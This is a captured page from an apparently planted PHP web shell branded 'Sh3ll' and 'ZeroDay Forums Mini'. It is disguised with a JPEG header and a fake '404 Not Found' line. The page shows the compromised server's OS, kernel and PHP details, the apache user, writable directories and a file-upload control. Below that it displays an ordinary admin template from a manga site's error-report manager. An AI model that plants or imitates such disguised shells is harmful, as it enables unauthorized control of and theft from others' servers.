ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/netphim/code/admin/report_manga/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/netphim/code/admin/report_manga/list_tpl.php
<div class="card">
    <div class="card-header">
        Search report
    </div>
    <div class="card-body">
        <form action="?act=admin&code=report_manga&type=list" method="get">
            <input type="hidden" name="act" value="admin">
            <input type="hidden" name="code" value="report_manga">
            <div class="form-body">
                <div class="row">
                    <div class="col-md-6">
                        <div class="form-group">
                            <label>Error type</label>
                            <select class="form-control" name="s[error_type]">
                                <option value="">---</option>
                                <?php
                                foreach($arr_error as $key=>$val){
                                    echo '<option value="'.$key.'">'.$val.'</option>';
                                }
                                ?>
                            </select>
                        </div>
                    </div>
                    <div class="col-md-6">
                        <div class="form-group">
                            <label>Description</label>
                            <input type="text" value="" name="s[error_des]" class="form-control">
                        </div>
                    </div>
                </div>
            </div>
            <div class="form-actions mt-3">
                <button type="submit" class="btn btn-success" name="submitbt"> <i class="fa fa-check"></i> Search</button>
                <button type="button" class="btn btn-inverse" onclick="location.href='?act=admin&code=report_manga'">Cancel</button>
            </div>
        </form>
    </div>

</div>

<div class="card">
    <div class="card-header">
        Report manga manager
    </div>
    <div class="card-body">
        <!--<a href="javascript:void(0);" class="btn btn-primary btn-sm mb-2" id="delete"><i class="fa fa-bars"></i> Detete
        </a>-->
        <form action="" method="post" id="form_quick_update">
            <input type="hidden" name="type2" value="">
            <table class="table table-bordered color-table info-table">
                <thead>
                <tr>
                    <th>Manga</th>
                    <th>Chapter</th>
                    <th>Type</th>
                    <th>Content</th>

                    <th>Time</th>
                    <th>#</th>
                </tr>
                </thead>
                <tbody>
                <?php echo $list;?>
                </tbody>
            </table>
        </form>
        <div class="text-right footable">
            <ul class="pagination" style="float: right;">
                <?php echo $nav;?>
            </ul>
        </div>
    </div>
</div>

ZeroDay Forums Mini